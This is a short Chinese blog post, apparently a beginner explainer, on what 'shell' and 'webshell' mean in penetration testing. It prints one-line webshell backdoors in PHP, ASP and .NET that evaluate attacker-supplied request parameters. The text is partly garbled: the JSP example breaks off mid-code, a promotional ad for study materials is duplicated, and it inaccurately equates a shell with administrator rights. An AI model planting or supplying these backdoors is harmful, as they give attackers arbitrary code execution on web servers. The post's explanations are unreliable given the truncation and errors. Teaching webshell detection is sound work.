渗透测试中说的Shell和Webshll到底是什么？_网络安全的拿下主机shell指的是什么

2401_84281703

于 2024-04-27 16:13:07 发布

阅读量194

点赞数 9

文章标签： web安全安全

本文链接：https://blog.csdn.net/2401_84281703/article/details/138251884

版权

“牛逼的Shell和WebShell”

- 💻Shell

💻Shell

Shell其实是主机的管理员权限，外行人听着好牛逼。For Example:

Windows中就是PowerShell
Linux中就是root权限

在这里插入图片描述

📺webshell

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

📹webshell分类

webshell根据脚本类型可以分为

PHP脚本木马

 <?php @eval($\_POST[value]);?>

ASP脚本木马

<%execute(request(“value”))%>

.NET脚本木马

<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"value");%>

JSP脚本木马

<%
**先自我介绍一下，小编浙江大学毕业，去过华为、字节跳动等大厂，目前阿里P7**

**深知大多数程序员，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！**

**因此收集整理了一份《2024年最新网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**
![img](https://img-blog.csdnimg.cn/img_convert/2e1f507777e7deb6a974071c1d6ae033.png)
![img](https://img-blog.csdnimg.cn/img_convert/26c9b8e7729a8cdaa0a4cbfa81e8a35f.png)
![img](https://img-blog.csdnimg.cn/img_convert/2f67a8507f95066e7ea7becf17314e47.png)
![img](https://img-blog.csdnimg.cn/img_convert/231c944d2119d2635b2c93604f4a3dbc.png)
![img](https://img-blog.csdnimg.cn/img_convert/266c60dc07080669f48c6186f592b871.png)
![img](https://img-blog.csdnimg.cn/img_convert/8dfdf285e4881880ceb5b74d2298ecaa.png)

**既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，涵盖了95%以上网络安全知识点，真正体系化！**

**由于文件比较多，这里只是将部分目录截图出来，全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
大纲路线、讲解视频，并且后续会持续更新**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

2401_84281703

关注

9
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
渗透测试中说的Shell和Webshll到底是什么？_网络安全的拿下主机shell指的是什么

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。Shell其实是主机的管理员权限，外行人听着好牛逼。webshell根据脚本类型可以分为。
复制链接

扫一扫